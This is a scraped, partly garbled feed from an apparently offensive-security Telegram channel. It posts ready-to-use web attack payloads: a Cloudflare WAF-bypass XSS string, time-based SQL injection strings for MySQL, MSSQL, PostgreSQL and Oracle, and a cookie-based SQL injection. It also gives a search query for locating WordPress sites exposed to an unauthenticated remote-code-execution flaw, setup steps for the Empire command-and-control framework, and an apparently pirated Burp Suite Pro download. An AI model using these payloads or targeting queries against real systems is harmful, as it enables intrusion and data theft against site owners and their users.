Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.
cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh
#Hacktoberfest #C2 #Redteam #Infrastructure
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8⚡1❤1
cloudflare WAF bypass XSS
any payload they blocked by cloudflare
this payload working
#Cloudflare #Bugbounty #Tip
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
any payload they blocked by cloudflare
this payload working
"><img src=x onerrora=confirm() onerror=confirm(1)>#Cloudflare #Bugbounty #Tip
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡3🔥2👍1👏1
burpsuite_pro_v2024.zip
692.2 MB
Burp Suite Version 2024 🔻
❌ نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت .✔️
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥7❤1
Cloudflare WAF Bypass Leads to Reflected XSS ®️
Payload Used :⛔
Payload Used :
#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload Used :
"><img src=x onerror=alert(1)> [Blocked By Cloudflare] Payload Used :
"><img src=x onerrora=confirm() onerror=confirm(1)> [XSS Popup]#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥4❤2👍1👎1
7 SQLs
4 in php
1 in aspx
2 in graphql
#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
4 in php
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/1 in aspx
orwa';%20waitfor%20delay%20'0:0:6'%20--%202 in graphql
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥9❤🔥3👍2
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡8❤🔥3🔥3👍1
Google Dorks to Find Sensitive data or dir
#google #cybersec #infosec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
#google #cybersec #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8⚡3❤🔥1🔥1
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
Injected in request like this
#BugBounty #Tips #SQL
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE-1 OR 6=6 AND 0-0=> TRUEInjected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0#BugBounty #Tips #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7❤2🔥1💯1
#Notification #Warning
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7⚡2❤2🔥1💯1
This is very cool. Get cheatsheets in your terminal with a curl command!
⌨️ Try this:
#Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
curl https://cht.sh/sqlmap#Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6⚡2❤1🔥1💯1
LearnExploit#Osint #Telegram #Discord
Please open Telegram to view this post
VIEW IN TELEGRAM
✍5⚡3👍2❤1🔥1💯1
If you discover an oracle web app, you can use this payload
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
❤4👍2⚡1🔥1
NoMore403
Introduction:
Prerequisites:
Before you install and run
Installation:
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
Github
⬇️ Download
#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Introduction:
nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.Prerequisites:
Before you install and run
nomore403, make sure you have the following:Go 1.15 or higher installed on your machineInstallation:
cd nomore403
go get
go build
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
./nomore403 -h
Github
⬇️ Download
🔒 LearnExploit#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡7👍4